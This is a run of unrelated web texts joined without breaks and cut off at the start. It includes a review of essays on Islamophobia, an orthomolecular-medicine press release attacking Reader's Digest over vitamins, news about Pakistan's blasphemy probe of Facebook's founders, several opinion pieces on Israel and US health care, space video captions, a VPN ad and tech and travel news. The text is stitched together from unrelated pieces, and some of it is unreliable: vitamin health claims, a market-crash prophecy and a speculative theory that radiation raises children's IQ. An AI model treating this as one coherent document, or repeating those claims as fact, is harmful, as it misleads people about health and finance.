[ What is needed is ] a deeper , more critical understanding of how patterns of anxiety and attraction are continually reinvented … and how they relate to prevailing ideas — of race , gender , citizenship , secularism , human rights , tolerance , and pluralism — that are important to Muslims and non-Muslims alike .
The essays range from North America to Lebanon to France to Germany ; their authors are as intent about urban renewal as they are about ethnic comedy .
It is a collection at once serious and sensible in its scope , ambitions and outcome .
Few readers will move from Berman ’s diatribes to Shryock ’s distilled insights without a jolt .
Can there really be this many ways of thinking about Islam and Muslims ?
There are if you ’re willing to shelve binaries and prejudgments long enough to consider the actual diversity within the Muslim community worldwide , as within the United States .
Two essays in particular throw into sharp relief how flimsy and distortive Berman ’s views of a singular Islam are , making him a bad faith Muslim spokesman .
Ayaan Hirsi Ali is as much a product of her environment as Berman .
Brooklyn College English professor , Moustafa Bayoumi’s “ The God that Failed : The Neo- Orientalism of Today ’s Muslim Commentators ” situates Hirsi Ali within a cohort that more nearly matches our own experience and outlook than the arch proponent of Muslim difference , Tariq Ramadan .
Bayoumi compares her to two figures like her : Irshad Manji and Reza Aslan .
All are immigrant Muslims to the United States .
All attempt to explain Islam to others from their own experience of its excesses .
Each draws “ a singular narrative account of Islam , where the faith is both a singular system and a singular force in the world . ”
That Grand Narrative not only frames their life stories but more importantly , it is used to explain history .
Hirsi Ali ’s story , as recounted in her bestseller Infidel , and in the recently released Nomad [ see Spencer Dew ’s review , An Atheist ’s Idealized Christianity — ed . ] , invokes the trope of the slave narrative , and “ like the slave narrative , hers is also one about achieving consciousness under a system of oppression . ”
To achieve freedom she must escape slavery , not only her own but the slavery of all people ‘ captivated ’ by Islam .
Bayoumi ’s principal paragraph on Hirsi Ali reveals more about her motivation and quest than the 35 - 40 pages of uncritical adulation from Berman .
Bayoumi writes :
Just as the Bible has the power to move the spirit in the slave narrative , so the Atheist Manifesto loaned to her by her boyfriend becomes Hirsi Ali ’s path to emancipation .
But the emancipation she details is not hers alone , for what would it matter if one Muslim gives up her faith ?
Hers is instead a broad prescription for all her co-religionists , and by the end of her narrative it is clear that she is lecturing to all the Muslims of the world .
If they are to enter modernity , they must give up God within their creed , not just individually but theologically .
According to Hirsi Ali , Islam ’s salvation is atheism .
Is that sound of Christopher Hitchens clapping somewhere , or are we just seeing the shadow , once again , of Paul Berman ?
The notion of a singular Islam that must be invoked , and then defeated , permeates almost all the narratives and strategies of Islamophobia .
The opposite stance informs Qasim Zaman ’s contribution in which the Princeton Islamicist sees a diffuse Islam , one that both requires and enjoys a complex intellectual engagement with the modern world .
Among Zaman ’s foremost subjects is no less a figure than Yusuf al - Qaradawi , a dark figure in Berman ’s account .
In the book by Ramadan ( the one that Daniel Pipes had initially praised ) , Berman claims that Ramadan links his intellectual project to Qaradawi’s and that the connection runs far deeper : “ Ramadan reveres Qaradawi .
The veneration is unmistakable .
Ramadan appears to hold Qaradawi in higher regard than any other present - day Islamic scholar . ”
So one might be surprised to find that Zaman imputes subtlety and ambiguity to Qaradawi ’s thought .
Indeed Zaman reviews Qaradawi ’s endeavors with sympathetic nuance .
Why the sympathy ?
Because of Qaradawi ’s expansive effort to find a consensus ( yes , that is the same term used by Ramadan ) among Muslims , not just scholars trained in madrasas , but also journalists , lawyers , and even Islamist leaders .
The effort to find such an unprecedented consensus in modern Islam has been channeled through the International Union for Muslim Scholars that Qaradawi helped found in 2004 ; it operates out of both London and ( since 2008 ) Cairo .
The real divide among this huge array of voices and perspectives is not between those calling for reform and those opposing it , but “ rather between different kinds of reform — one genuine , because it is anchored in Islam , the other insidious , for serving anti-Islamic interests . ”
Though Qaradawi does strive for an Islamic religio- political order , he also projects “ a global Muslim consciousness as an alternate globalization , one charted in the face of the Western neo- imperialist threat . ”
Should we then fear Qaradawi , as Berman implies we must ?
Not really , since many of those in the Muslim Scholars Union do not agree with Qaradawi about where and how the line between genuine and insidious reform is to be drawn .
After examining all available evidence , Zaman concludes that :
there clearly is a broad and growing agreement within the ranks of the ulama [ Muslim legal scholars ] as well as between the ulama and other religious intellectuals that bridging the gulf between different intellectual traditions is desirable and , indeed , a matter of great urgency .
Yet there is no unanimity on what precisely is the gulf that most needs to be bridged and why the effort to do so is worth making .
What does remain clear is “ the evolving arena of debate and contestation which … extends well beyond any dichotomous constructions . ”
It is this messiness at the heart of contemporary Islam that needs to be highlighted even if it is less rhetorically gripping than a slavery - freedom narrative or has a less visceral appeal than an account of fatwas for or against public stoning for adultery .
All of us — not just academics and Islam watchers — need to recognize the real face ( or faces , more accurately ) of the 21st - century Muslim world , which is no less diverse and complex , nor less baffling , bemusing , and ennobling than its Abrahamic counterparts who happen to be , or choose to be , Christian , Jewish , or even secular .
One can opt for Islamophobia or Islamophilia , but either option misses the actual drama of today ’s Muslim world , its enduring search for consensus and its multiple contestants for authority — both at home and abroad .
This article may be reprinted free of charge provided 1 ) that there is clear attribution to the Orthomolecular Medicine News Service , and 2 ) that both the OMNS free subscription link http://orthomolecular.org/subscribe.html and also the OMNS archive link http://orthomolecular.org/resources/omns/index.shtml are included .
FOR IMMEDIATE RELEASE
Orthomolecular Medicine News Service , March 31 , 2010
Does READER'S DIGEST
Shill for the Pharmaceutical Industry ?
Or is it Only a Really Bad April Fool 's Joke ?
Comment by Andrew W. Saul
Editor - In - Chief , Orthomolecular Medicine News Service ( OMNS , Mar 31 , 2010 ) Reader 's Digest 's editors cannot possibly be as ignorant as their April 2010 article " 5 Vitamin Truths and Lies " seems to indicate .
Or can they ?
Surely their silly attempt at vitamin - bashing is merely an April Fool 's joke .
Is n't it ?
Read over " 5 Vitamin Truths and Lies " and decide for yourself .
It is online at http://www.rd.com/living-healthy/5-vitamin-truths-and-lies/article175625.html
Be sure to note readers ' comments following the article .
You may wish to leave a comment or two of your own .
Reader 's Digest 's circulation , by the way , is dropping rapidly .
Once , it had a circulation of 18 million .
( 1 ) Just a few years ago , it had a circulation of 8 million .
It is now 5.5 million .
( 2 ) The magazine is also no longer published every month , but is down to 10 issues a year .
Furthermore , Reader 's Digest posted a loss of $ 653 million in only nine months of last year , and the company is in debt for a whopping $ 2.1 billion .
( 2 ) Perhaps they are getting desperate for cash .
At least that might explain the 15 pages of pharmaceutical advertising in their April 2010 issue .
Peer - reviewed research shows that pharmaceutical advertising does in fact bias periodicals against vitamin therapy . ( 3 ) A laughably - biased article such as " 5 Vitamin Truths and Lies " confirms it .
To send your thoughts directly to the Reader 's Digest editors : RDEditorial_RDW@ReadersDigest.com
When you 've done so , please feel free to send us a copy of your correspondence with RD : omns@orthomolecular.org .
A sampling of your letters will be selected for the next OMNS .
To learn more about how vitamins safely and effectively fight disease : http://orthomolecular.org/resources/omns/index.shtml
References : ( 1 ) US History Encyclopedia , accessed at http://www.answers.com/topic/reader-s-digest
( 2 ) Flamm M. Reader 's Digest cuts circulation , expands digital options .
June 19 , 2009 .
http://www.crainsnewyork.com/article/20090619/FREE/906199993
( 3) Pharmaceutical advertising biases journals against vitamin supplements .
Orthomolecular Medicine News Service , Feb 5 , 2009 .
http://orthomolecular.org/resources/omns/v05n02.shtml
Nutritional Medicine is Orthomolecular Medicine Orthomolecular medicine uses safe , effective nutritional therapy to fight illness .
For more information : http://www.orthomolecular.org
The peer - reviewed Orthomolecular Medicine News Service is a non-profit and non-commercial informational resource .
Editorial Review Board : Carolyn Dean , M.D. , N.D. ( Canada )
Damien Downing , M.D. ( United Kingdom )
Michael Gonzalez , D.Sc. , Ph.D. ( Puerto Rico )
Steve Hickey , Ph.D. ( United Kingdom )
James A. Jackson , PhD ( USA )
Bo H. Jonsson , MD , Ph.D ( Sweden )
Thomas Levy , M.D. , J.D. ( USA )
Jorge R. Miranda - Massari , Pharm .D. ( Puerto Rico )
Erik Paterson , M.D. ( Canada )
Gert E. Shuitemaker , Ph.D. ( Netherlands ) Andrew W. Saul , Ph.D. ( USA ) , Editor and contact person .
Email : omns@orthomolecular.org
To Subscribe at no charge : http://www.orthomolecular.org/subscribe.html
To Unsubscribe from this list : http://www.orthomolecular.org/unsubscribe.html
Facebook founder Mark Zuckerberg is being investigated by Pakistani police under a section of the penal code that makes blasphemy against Muhammad punishable by death .
BBC Urdu reports — according to a Google Translation — that Pakistan 's Deputy Attorney General has launched a criminal investigation against Zuckerberg and others in response to Facebook hosting a " Draw Muhammad " contest on its site late last month .
On May 19 , Pakistani authorities blocked access to Facebook over the contest , and this ban was lifted on May 31 after Facebook removed the page in Pakistan and other countries .
Asked to comment , a Facebook spokeswoman told us the company does not comment on legal matters .
Last month , according to English - language Pakistani newspaper The News International , a Pakistani High Court judge summoned the police after lawyer Muhammad Azhar Siddique filed an application for a First Information Report ( FIR ) , claiming that the owners of Facebook had committed a heinous and serious crime under Section 295 - C of the Pakistan Penal Code .
In essence , an FIR launches a criminal investigation .
But no charges have been filed .
According to the paper , Section 295 - C of the penal code reads : " Use of derogatory remark etc , in respect of the Holy Prophet , whoever by words , either spoken or written , or by visible representation , or by any imputation , innuendo , or insinuation , directly or indirectly , defiles the sacred name of the Holy Prophet Muhammad ( Peace Be Upon Him ) shall be punished with death , or imprisonment for life , and shall also be liable for fine . "
So , peace be unto Muhammad .
But not unto Mark Zuckerberg .
According to two reports — one at Boxcrack.net , a kind of citizen journalism site run by Privacy International , and another at Pro Pakistani , a Pakistani Telecom and IT news site that lifted the news from BBC Urdu — the Deputy Attorney General has indeed lodged an FIR against Zuckerberg , fellow co-founders Dustin Moskovitz and Chris Hughes , and " Andy " , the German woman who initiated the Draw Muhammad contest under a pseudonym .
According to Pro Paskistani , petitioner Muhammad Azhar Sidiqque said he 's waiting for the police to contact Interpol about making arrangements for the arrest of Facebook 's owners and " Andy " .
The site also says that the Deputy Attorney General told the High Court that Pakistan ’s United Nations representative has asked to escalate the issue in the UN General Assembly . ®
JIDDA — Roughly two years ago , Rowdha Yousef began to notice a disturbing trend : Saudi women like herself were beginning to organize campaigns for greater personal freedoms .
Suddenly , there were women asking for the right to drive , to choose whether to wear a veil , and to take a job without a male relative ’s permission , all using the Internet to collect signatures and organize meetings and all becoming , she felt , more voluble by the month .
The final straw came last summer , when she read reports that a female activist in Saudi Arabia ’s eastern province , Wajeha al - Huwaider , had been to the border with Bahrain , demanding to cross using only her passport , without a male chaperon or a male guardian ’s written permission .
Ms. Huwaider was not allowed to leave the country unaccompanied and , like other Saudi women campaigning for new rights , has failed — so far — to change any existing laws or customs .
But Ms. Yousef is still outraged , and since August has taken on activists at their own game .
With 15 other women , she started a campaign , “ My Guardian Knows What ’s Best for Me . ”
Within two months , they had collected more than 5,400 signatures on a petition “ rejecting the ignorant requests of those inciting liberty ” and demanding “ punishments for those who call for equality between men and women , mingling between men and women in mixed environments , and other unacceptable behaviors . ”
News & Game Updates
Summary :
This release features improved terrain rendering , which both looks better and increases rendering performance drastically in most situations .
This release also features changes to cloaking and bug fixes for replays .
If you have already ordered Achron , you can download it here .
» Read More & see the Changelog
Summary :
This release contains numerous bug fixes and adds new modding capabilities to Resequence .
If you have already ordered Achron , you can download it here .
» Read More & see the Changelog
The crew of Apollo 11 had made history by landing on the moon and coming back to Earth in one piece .
But before the celebrations could begin , they would have to spend some time in quarantine
Why the Apollo 11 Crew Was Quarantined Upon Return ( 2:59 )
To prepare him for landing the lunar module , Neil Armstrong practiced on a training vehicle right here on Earth .
It was designed to replicate flying within a gravitational pull that was 1/6 that of Earth
How Neil Armstrong Trained to Land the Lunar Module ( 2:13 )
After the success of Apollo 11 , NASA unveiled an ambitious agenda for more missions into space .
But interest among the public was beginning to drop — and the Nixon administration balked at the high costs
Why Interest in Space Travel Waned After Apollo 11 ( 2:48 )
A former Grumman worker talks about the lunar lander he and his colleagues built .
Video by Mike Marcucci
“ An Engineering Masterpiece ” ( 2:29 )
Animation showing how the TESS exoplanet - hunting telescope will observe the sky .
TESS will watch each observation sector for at least 27 days , before rotating to the next one , covering first the south and then the north to build a map of 85 percent of the sky .
TESS Telescope View of the Sky ( 0:26 )
During a February 2013 U.N. meeting on international strategies for protecting Earth from incoming asteroids , astronaut Chris Hadfield , a member of the Association of Space Explorers , addresses attendees from onboard the International Space Station .
Video : Association of Space Explorers
Chris Hadfield
On the Asteroid Threat ( 6:44 )
In this clip from the 1967 Soviet movie A Cruise to the Stars , cosmonaut Yuri Gagarin is shown training for his historic mission as engineers test various systems of the Vostok capsule .
Accepting the task before him , Gagarin tells space officials that if he encounters any difficulties in space , I will overcome them as the communists do .
On launch day , April 12 , 1961 , Chief Designer Sergei Korolev radios his best wishes as Gagarin takes off .
After his 108 - minute flight , Gagarin becomes an international sensation , with parades and celebrations in his honor .
A Cruise to the Stars , which runs 52 minutes , was made to commemorate the first 10 years of the Soviet space program .
We do not consider the conquest of space as the achievement of only our people but as that of all mankind , the narrator says .
We happily place it at the disposal of all nations and peoples in the name of progress , happiness , and welfare of all men .
Excerpt : " A Cruise to the Stars " ( 13:54 )
Before John Young and Robert Crippens STS - 1 mission in April 1981 , no astronauts had ever landed a spaceship on a runway .
In their postflight briefing , Young ( the first voice in this clip ) and pilot Crippen describe their first - time return of a shuttle from orbit , during which the vehicle executed a series of S - turns , or roll reversals , like a skier slaloming downhill to manage speed .
STS -1 : The First Shuttle Landing ( 5:55 )
It was a scene straight out of Apollo 13 astronauts and ground controllers working together to improvise a new plan when Plan A had failed .
The task on Endeavour 's first flight in May 1992 was to capture the stranded INTELSAT - VI satellite , attach a new rocket motor , and send it to a new orbit .
But when early attempts to grab the satellite with a special " capture bar " failed , Pierre Thuot , Rick Hieb and Tom Akers had to go outside and steady the 9,200 - pound spacecraft by handthe first and only three - man spacewalk in shuttle history .
Get your FREE 24h Trial Now !
No credit card required !
After registration , you will get an email with detailed steps on how to get FREE trial using promo code Free24 Hours and you will see exactly how easy it is to start watching blocked UK TV channels from anywhere in the world !
Since we switched to daylight saving time , it ’s no longer dark when I finish work .
I appreciate the extra daylight , and I love the warmer temperature .
The only downside is that it ’s not as easy to catch sunsets downtown anymore !
I can no longer carry my camera with me and pop in Parliament Hill to shoot nice river sunsets after work .
Or I have to wait until 7:30 pm … and frankly , after a long day at work , I just want to go home .
So here is one of the last “ winter sunset ” of the season .
As usual , you can see the pictures on my Flickr set Canadian Skies & Sunsets .
University of Texas at Austin researchers have received a $ 3.3 million National Institutes of Health ( NIH ) grant to conduct a five - year study of speech and language development in bilingual children who speak English and Spanish , comparing those whose language skills are delayed with those who have no delays .
" Spanish speakers are the largest language minority in the United States and make up 79 percent of the school age limited English speaking population , " says psychologist Zenzi Griffin , a researcher for the project .
" Yet , it is unclear how children move from first to second language development and which oral language skills transfer between the two languages .
At the same time , there is a popular myth that exposure to two languages will slow down language learning in children , especially those who have language impairment . "
Language impairments include difficulty learning and using language rules -- in particular grammatical development , usage and vocabulary -- in children who have no other disabilities that would explain their language delays .
For the study , Griffin will work with Professor Elizabeth Peña and Associate Professor Lisa Bedore , both with the Department of Communication Sciences and Disorders in the College of Communication .
About 1,800 bilingual children in Austin will be screened starting in preschool , first grade or third grade .
The study will examine the relationship between learning sounds in words , vocabulary and grammar , to compare performance that stems from linguistic experience with performance that reflects language ability .
Of those children , a subset of 330 will be followed through fifth grade .
This phase of the study will document year - to - year changes in bilingual children 's oral language skills in both languages and compare them to English - only speakers .
" I would hope that the research will help us understand how children learn language and how two languages interact in a single person , " says Peña .
" I expect that knowing this information and the different patterns of bilingual language use in children with and without language impairment will help us to develop more accurate measurements of language ability and will lead to improved intervention for children with language impairment . "
###
Intelligence tests recently carried out among more than a thousand children in Wolverhampton schools appear to show a striking and quite unexpected increase in the mental capacity of children born since 1945 .
A psychiatrist concerned in the tests has suggested that the most probable hypothesis to account for this change is the effect on the brain of the increase in " background radio- activity " .
The tests were carried out under the direction of Dr J. Ford Thomson , consultant children 's psychiatrist to the Wolverhampton and Shrewsbury group of hospitals .
They were begun after several children , referred to Dr Thomson by the schools on account of educational difficulties , had been found to show quite unexpected abilities .
A child of 7½ , described as a problem child in the " C " stream at school , was found to be exceedingly clever and well informed on astronomy , and was given an intelligence quotient of 142 .
Within two months another " prodigy " came along .
He was also a " problem child , " aged about 10 ½ .
He was found to have an I.Q. of 166 .
These instances impelled Dr Thomson to search for more " prodigies " in Wolverhampton .
He found what he was not looking for – namely , that all the children of this age group were by pre-war standards remarkably advanced .
Having failed to find any other convincing explanation of this phenomenon , he has tentatively put forward the theory that only stimulation of the mind of the growing child by " background " atomic radiation seems to fit the facts .
In support of this he notes that the age group tested has been going through its period of quickest growth during the period in which atomic tests have been taking place .
These children have been exposed to both man-made and natural radiation ; like all other human beings , they are continually absorbing radiation into their bone structure ; but children of this age , it is suggested , absorb it more quickly and it has more effect upon them .
Dr Thomson suggests that that effect is to speed up the development of their brain structure – that is , the process of " cerebral myelinisation " .
He agrees with the recent report of the Medical Research Council on the hazards of nuclear radiation , that this is not at a stage where one need be alarmist about it .
On the other hand , while its effect seems to be stimulating to children now , what will be its effect in the future ?
He is anxious to dispel what may be " a false sense of confidence " .
Dr Thomson intends to pursue these intelligence tests and to collect more evidence from some thousands more Wolverhampton children .
If you did n't have peripheral vision , it would probably be fine .
If you did n't glance to the sides of Israel 's highway 443 between Jerusalem and Tel Aviv , then it would n't smack you in the face that the road is – how shall we put it ?
– segregated .
As it is , you can't help but notice that when the 443 passes by the Israeli town of Modi'in and heads east into the occupied West Bank , some of its side - routes are blocked .
Concrete boulders , metal barriers , rubble and heaps of rubbish halt roads from Palestinian villages such as Beit Sira and Beit Ur al - Fuka .
And if you stop at one of those barricades , a complicated coping apparatus comes to light : cars deposit weary Palestinians who work inside Israel at these blocked routes ; on the other side , lines of parked Palestinian cabs await to resume the interrupted journey home .
Palestinians without permits to work or travel inside Israel can't be on the 443 at all .
So for the 3,000 inhabitants of Beit Sira , one of six villages affected by the blocked highway , a trip to nearby Ramallah , about 12 miles away , now takes hours via minor roads that are prohibitively long , pot-holed and sometimes flooded .
Some 55,000 Palestinians are thought to be affected by the road ban .
The Israeli military barred Palestinian access to this road in 2002 , citing security reasons after several shootings in which five Israelis were killed .
But last December , Israel 's supreme court ruled that this sweeping ban on Palestinian movement was disproportionate and that the roadblocks had to be lifted .
The court pointed out that the 443 – which cuts through the occupied West Bank for a 12 - mile stretch – had only been approved during the 1980s on condition that it would be open to all .
( A comic Hebrew animation explains this here . )
The army has had five months to sort it out , but that time was mostly employed by ministers to scaremonger about how an open 443 would make sitting targets of Israeli drivers , who would instantly migrate to the main Tel Aviv - Jerusalem route , highway 1 – and choke it .
Now the military has unveiled its response to the court 's decision : a sort of de - block - and - re - block manoeuvre .
The idea is to partially open parts of the road but to compensate that with an extra checkpoint at one end , scrutinising those Palestinians newly permitted to drive this limited section .
And so , once again , the Israeli military – the real authority in the West Bank – has shown that , unless absolutely compelled to do so , it can not be trusted to do the right thing in the occupied territories .
No matter that thousands of Palestinians who have nothing to do with any shooting or stone - throwing are denied easy access to the most basic facilities .
No matter that sick patients do n't make it to hospital on time ; or that Palestinians have to rise at the crack of dawn , slip through the crevices of concrete barriers and creep slowly though an Israeli checkpoint – while Israeli - plated cars breeze past – just to get to work .
And why bother getting to the bones of the issue by asking why those few Palestinians would have attacked Israeli cars whistling through the West Bank , on a road that has been dug out of occupied land , in the midst of the viciously crushed second intifada ?
No ; far easier to completely bar Palestinian passage on this road .
And when the Israeli court challenges that , just block the road in a different way and see if those pedantic judges shut up .
But could the court be disinclined to shut up on this matter ?
The Israeli military claims that the court knew about the partial - opening plans .
Meanwhile , some 1,000 Israeli families have petitioned the court to keep the road closed because they say the army 's solution is too lax .
And the Association of Civil Rights in Israel , which filed the original petition to open the road , immediately filed another in response to army 's unblocked - but - closed policy .
It looks as though highway 443 – so often cited as a symbol of segregationist policy – might not be properly open to Palestinians in the near future .
But until it is , a drive on this road feels like a fast , scenic shortcut through another people 's daily punishment .
• Comments on this article will remain open for 24 hours from the time of publication but may be closed overnight
Mozilla has released an early pre-alpha preview of its mobile Fennec browser for Google 's Linux - based Android operating system .
It will run on Android 2.x smartphones , including the Nexus One .
We conducted some hands - on testing to see how it compares with Android 's native browser .
We took a look at how Mozilla is porting its browser to Android several months ago when the project was still at a very early stage of development .
Mozilla is leveraging Android 's Native Development Kit ( NDK ) to bring its Gecko rendering engine to the platform .
Using JNI , the Gecko renderer is embedded in a thin Java layer through which input events are relayed to the Gecko engine .
Gecko renders Fennec 's XUL - based user interface in addition to the actual HTML page content .
This makes it possible for the browser to support add - ons and other unique features , such as the AwesomeBar , that are enabled by Mozilla 's technology stack .
Fennec on Android uses the same visual theme as the N900 version .
The left - hand sidebar displays thumbnails for each tab and the right - hand sidebar provides access to bookmarks , settings , add - ons , and downloads .
Fennec add - ons , including Weave , can be installed directly through the extension sidebar panel .
Although it does n't perform nearly as well as Android 's native browser , the Fennec pre-alpha build is acceptably responsive on my Nexus One .
Scrolling is a bit jittery while pages are loading , but is generally smooth during regular use .
Zooming and orientation changes are swift and painless .
Page rendering is decent , but the fonts are n't as readable in Fennec as they are in the native Android browser when a page is zoomed out .
The area where Fennec for Android is currently weakest is input support .
When it is used in landscape orientation , the onscreen keyboard does n't consistently work properly .
For example , text does n't appear in the text preview area when you are typing in landscape mode , but still shows up in the selected textbox .
The program also lacks support for navigating with the device 's scrollball .
Android 's process handling is another area where the Fennec port does n't quite fully conform with the operating system 's idiosyncrasies yet .
Android will occasionally terminate memory intensive applications , which means that it 's necessary for programs to be able to save and restore their internal state .
When Fennec gets terminated , its state is n't properly restored when it is opened again .
This means that you can potentially lose all of your open tabs if you switch to other applications .
That said , it 's important to remember that the program is still at a pre-alpha stage of development and has a long way to go before the first official stable release .
Despite the early stage of development , the program is quite functional .
With further refinement , it could be a very useful alternative to Android 's built - in browser .
Users who want to test the program on their own Android handsets can download it from Mozilla 's website .
The correction , soon to be crash , is here : the market had a bigger relative open to close move today than it did on May 6 .
We closed at the day 's lows on massive volume , despite definitive central bank intervention , regardless whether it was the SNB , the ECB , or the Fed .
The central planners have lost control of the market , and all thanks to the inevitable collapse of hyper capitalist Keynesianism coming out of the formerly most communist country in the world .
A day of ironies .
And it 's not over .
Futures are already down another 4 handles .
The correction is coming , and it will be a bloodbath .
The Fed can not push rates lower .
It will print .
It is inevitable .
It is our destiny .
Update : Futures now 7 handles lower .
46 point move in ES : that is almost a 5 % move in the S&P for now .
In unserer kleinen Serie “ Die etwas unglücklich platzierte Werbeanzeige ” hat es mal wieder Bild.de erwischt :
Mit Dank an Tobias M .
Nachtrag , 19.20 Uhr : Bild.de hat die Anzeige für Messer durch eine für Navigationsgeräte ersetzt .
Microsoft Bing Map has an awesome set of ‘ Map Apps ’ that offers more conventional functionality to simple driving directions .
Among these include a Gas Prices
App that shows how much gas costs at nearby stations , a Parking Finder App that shows where parking spots are available , traffic on streets and even a Roadside Sculptures and Urban Graffiti App that shows weird things you can see on roadside along your way .
A recent addition to Bing Maps is the Bing Destination Maps App from Microsoft Research .
This Silverlight powered app renders map routes into easy to follow and aesthetically appealing hand sketches .
Bing Destination
Maps sketches a driver ’s route and removes any streets , avenues or roads that are n’t necessary to get where he or she ’s going .
Think of it as driving directions for dummies .
To use Destination Maps go to Bing Maps and click on ‘ Map Apps ’ on the bottom left as shown below .
You might have to change your preferred location to United States in order to see the button .
Select the Destination Maps App , choose a location , drag a box around the area of interest , give the map a name and Bing renders the route .
There are 4 types of alternative look for the map :
Sketchy
Style that looks just like a map sketched out on a napkin European Style looks like the regular Bing Maps but a lot of the streets that wo n’t aid someone in getting to the destination have been removed American Style is a cross between the traditional Bing Maps and the sketch view Treasure Map Style is like Sketchy Style but drawn on paper that looks ages old and folded
It is possible to save the map to your computer as a JPEG or PDF and easily print it or share the map by sending a link to people .
Destination Maps is currently in beta and available for locations only in the US , Canada and Mexico .
[ via Infosthetics ]
Thursday , May 6 , 2010 at 12:55AM
Earlier this week , Princess Cruises finalized an agreement with the Fincantieri shipyard in Italy to construct two new ships to add to its current fleet of 17 .
The two ships will be the two largest in the current fleet , and two of the largest ever constructed for Princess .
Exact dimensions and exact cost are unknown at this time .
What is known is that the ships will have a passenger capacity of roughly 3600 each .
Additionally , Princess will expand the size of the central atrium on the new ships to dimensions never before seen on any ship in the Princess fleet .
Moreover , with the two new ships , the cruise line will continue to adhere to its ever popular ratio of balcony staterooms to interior staterooms .
That ratio , which has traditionally been 4 to 1 , is one of the highest ratios of that kind in the industry .
The Chief Executive Officers of both the Fincantieri shipyard and Princess Cruises expressed enthusiasm and gratitude to each other on behalf of their companies , for finalization of the contract .
It was not lost on either CEO that the contract was signed during an economic recession .
Fincantieri CEO
Giuseppe Bono thanked Princess for placing its trust in the shipbuilder despite the unpredictable world economy .
Princess CEO
Alan Buckelew expressed confidence in the ability of Princess Cruises to weather the economic storm .
Design specifics for each of the two ships are forthcoming .
Princess Cruises was purchased by the multinational Carnival Corporation in 2003 .
The Fincantieri shipyard is well acquainted with Carnival Corporation , as it is currently in the process of constructing what will become the second - largest ship in the fleet of another Carnival Corporation line , Holland America .
In total , cruise lines owned by Carnival Corporation will add a dozen new ships over the next four years , bringing the total number of ships operated by all lines within the Carnival Group to 107 .
original story ( Princess Cruises )
I celebrated the passage of the health care reform bill by going to see a movie about the Republican vision for health care .
Repo Men , starring Jude Law and Forest Whitaker , portrays a dystopian future ( is there any other kind these days ? ) in which private enterprise ’s control over the medical system has reached its logical conclusion .
Patients can purchase , for the price of a Manhattan condo , a high - tech artificial replacement for virtually any body part or organ .
The only catch is that they ’re then in hock , at credit card interest rates , to the corporation that has gained a monopoly over the trade , a corporation which bears a striking , albeit slightly hyperbolic resemblance to today ’s giant health insurance corporations ( insurance itself seems to have vanished in this future world ) .
Oh , there ’s one other catch as well : those who ca n’t keep up the payments for their new body part are hunted down by the film ’s eponymous repo men and knocked out by a tranquilizer dart , after which the organ or joint in question is reclaimed .
” I ’m required by law to ask you if you would like an ambulance to be called or to wait on standby , ” Jude Law tells an unconscious patient before slicing open his chest and repossessing his artificial heart .
Related Posts The Nerve Of Some People
I would n’t say I ’m over the moon about Obama ’s “ government takeover of health care . ”
I ’d be considerably happier if it actually were a government takeover , because while I ’m not fully convinced a single payer system is the best way to go , it ’s got to be a vast improvement over letting the private insurance cartel run things .
But at the same time I ’m inclined to think a public - private hybrid like the one that exists in Australia and a number of European countries might do the best job of providing universal care and keeping costs down .
Be that as it may , while I was n’t enthusiastic about the watered down , attenuated version of health care that finally emerged from the House of Representatives , many if not most of my doubts were assuaged by the spectacle of Republicans railing against it like so many Kang and Kodos doppelgängers .
To suggest that John Boehner ’s body had been inhabited by a malevolent space alien would be generous , since any terrestrial explanation for the dazzling array of illogic and untruth he and his colleagues have unleashed on the public these past weeks would reflect far less favorably on him .
Although I vote for Democrats most of the time , I would n’t consider myself an especially partisan person .
I never cared much for Nancy Pelosi , and my affection for Barack Obama has more to do with his ideals ( at least as expressed by him ) and his rhetoric than his political affiliation .
But Pelosi has certainly grown in my estimation as a result of her ability to steer this bill through Congress , and just when I was starting to lose faith in Obama ’s willingness or even ability to stand up for principles and knock a few heads together if necessary , he ’s come through just as I always hoped he could .
Yes , of course I ’d like a robust ( as they say ) public option , and I ’d like even more a federal rate commission empowered to put the kibosh on extortionate insurance prices ( I just got hit with a 20 percent increase this year , which apparently is “ moderate ” compared to what some have been asked to pay ) , but let ’s be realistic : the bill that got through the House yesterday is the most that we can expect at this time .
My guess is that Congress will have to revisit it when problems start cropping up and insurance rates keep rising , but at least we have ( finally ! ) established that the government has a legitimate role in guaranteeing what private industry has manifestly failed to do : provide all Americans with reasonably priced and effective health care .
“ Health care is a privilege , not a right ” seems to be the latest talking point of Republican legislators and talk show hosts , which seems to fly in the face of the Declaration of Independence : “ We hold these truths to be self - evident , ” it reads , “ that all men are created equal ; that they are endowed by their Creator with inherent and inalienable rights ; that among these , are life , liberty , and the pursuit of happiness . ”
Note : it says “ rights , ” not privileges , and how could you argue that life itself , not to mention liberty and the pursuit of happiness , are not threatened — if not made downright impossible — by the lack of access to medical care ?
The Declaration goes on to say : “ … that to secure these rights , governments are instituted among men , deriving their just powers from the consent of the governed ; that whenever any form of government becomes destructive of these ends , it is the right of the people to alter or abolish it , and to institute new government , laying its foundation on such principles , and organizing its powers in such form , as to them shall seem most likely to effect their safety and happiness . ”
Hello , teabaggers !
Organizing its powers in such form as to them shall seem most likely to effect their safety and happiness .
All this blather about government having “ no business ” getting involved in health care flies right out the window when looked at in this light .
Sick people are not safe and happy ; sick people are not at liberty to live their lives to the best of their abilities ; in many cases , sick people lose even the right to life itself .
Organizing governmental powers so as to address this very real problem is as American as it gets ; letting private corporations maintain a stranglehold over who does and does not receive medical care and allowing people to be bankrupted by illness is , on the other hand , downright unpatriotic .
It ’s the sort of thing you would expect in a feudal or caste - ridden system , not the shining city on a hill that confused teabaggers make America out to be , all the while contradicting and undermining everything that was ever admirable about this land .
—
Larry Livermore is a writer currently living in Brooklyn , New York .
He penned a column for Maximum Rock ‘n Roll for seven years , followed by a 14 - year stint at the now - defunct Punk Planet .
Check out his blog at www.larrylivermore.com, or email him at llivermore@gmail.com .
This column was originally published on larrylivermore.com .
In April , a St Louis area single mom lost her day job when her employer discovered her out - of - hours work : blogging about her polyamorous escapades .
The woman – whose blog is called ' The Beautiful Kind ' ( or TBK ) – was unmasked thanks to cached copy available on Twitter search engine Topsy : her full name ( which she 'd entered , then deleted ) was still listed next to her nickname in the search engine .
Thanks to TBK 's story , Topsy no longer displays a user 's full name next to his or her Twitter nickname , even if the user has associated the two .
" We may add [ full names ] back in the future , after we can fill in the gaps in the existing system , " Topsy spokesman Brian Merritt tells Inc.com .
" The story of the blogger and our disappointment at having played a role in her losing her job led to this decision . "
Topsy is n't totally safe for sex bloggers ( and anyone else ) who wants to keep their Twitter life out of the office , though .
Merritt cautions that the company is still tweaking its system to be " as effective as possible at finding folks without introducing privacy issues / concerns .
